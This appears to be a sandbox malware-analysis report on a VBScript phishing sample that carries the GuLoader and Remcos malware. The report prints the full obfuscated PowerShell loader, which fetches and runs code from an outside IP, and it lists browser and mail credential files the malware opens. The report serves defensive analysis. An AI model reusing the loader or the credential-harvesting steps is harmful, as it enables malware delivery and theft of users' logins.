                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7868Thread sleep count: 243 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7868Thread sleep time: -121500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep count: 5715 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep time: -17145000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep count: 3752 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep time: -11256000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_227910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_227910F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv8
                Source: wab.exe, 00000009.00000002.2993796074.00000000065E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX/d
                Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: wscript.exe, 00000000.00000003.1717969194.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
                Source: wscript.exe, 00000000.00000003.1712586037.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721244381.0000027D86CE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713309532.0000027D86CC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717969194.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717760543.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713608480.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721362071.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713410944.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2394644445.0000026CEED94000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: wscript.exe, 00000000.00000003.1712586037.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717760543.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721362071.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}6b~
                Source: bhv5123.tmp.13.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node graph_11-33819
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_026BD430 LdrInitializeThunk, 4_2_026BD430
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_22792639
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22794AB4 mov eax, dword ptr fs:[00000030h] 9_2_22794AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2279724E GetProcessHeap, 9_2_2279724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_22792B1C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_227960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_227960E2

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: amsi64_5352.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F0FEF8
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt 
Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf 
';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager&5H
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\O5
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\79a5
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\23
                Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr Binary or memory string: [Program Manager]
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792933 cpuid 9_2_22792933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22792264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_22792264
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041739B GetVersionExW,10_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: ESMTPPassword (11_2_004033F0)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword (11_2_00402DB3)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword (11_2_00402DB3)
Source: Yara match | File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wab.exe PID: 7936, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wab.exe PID: 8036, type: MEMORYSTR

                Remote Access Functionality

Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-LO8JH
Source: Yara match | File source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK matrix (numbers in parentheses are the badges shown next to matched techniques):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (221) | Valid Accounts | Windows Management Instrumentation (1) | Scripting (221) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (11) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (11) | DLL Side-Loading (1) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Input Capture (11) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | Logon Script (Windows) | Process Injection (212) | Software Packing (1) | Credentials in Registry (2) | File and Directory Discovery (2) | SMB/Windows Admin Shares | Email Collection (1) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Command and Scripting Interpreter (212) | Login Hook | Login Hook | DLL Side-Loading (1) | Credentials In Files (1) | System Information Discovery (129) | Distributed Component Object Model | Input Capture (11) | Remote Access Software (1) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | PowerShell (2) | Network Logon Script | Network Logon Script | Masquerading (1) | LSA Secrets | Security Software Discovery (141) | SSH | Clipboard Data (2) | Non-Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (31) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Application Layer Protocol (112) | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Access Token Manipulation (1) | DCSync | Process Discovery (4) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection (212) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1465957 | Sample: STATEMENT OF ACCOUNT.vbs | Start date: 02/07/2024 | Architecture: WINDOWS | Score: 100

Sample: DNS geoplugin.net; signatures: Found malware configuration, Malicious sample detected (through community Yara rule), Yara detected GuLoader, 10 other signatures
  wscript.exe (started by the sample)
    signatures: VBScript performs obfuscated calls to suspicious functions, Suspicious powershell command line found, Wscript starts Powershell (via cmd or directly), 3 other signatures
    -> powershell.exe
      network: 103.237.86.247, 49731, 49738, 80 (BGNR-AP2BainandCompanySG, unknown)
      signatures: Suspicious powershell command line found, Obfuscated command line found, Very long command line found, Found suspicious powershell code related to unpacking or dynamic code loading
      -> powershell.exe
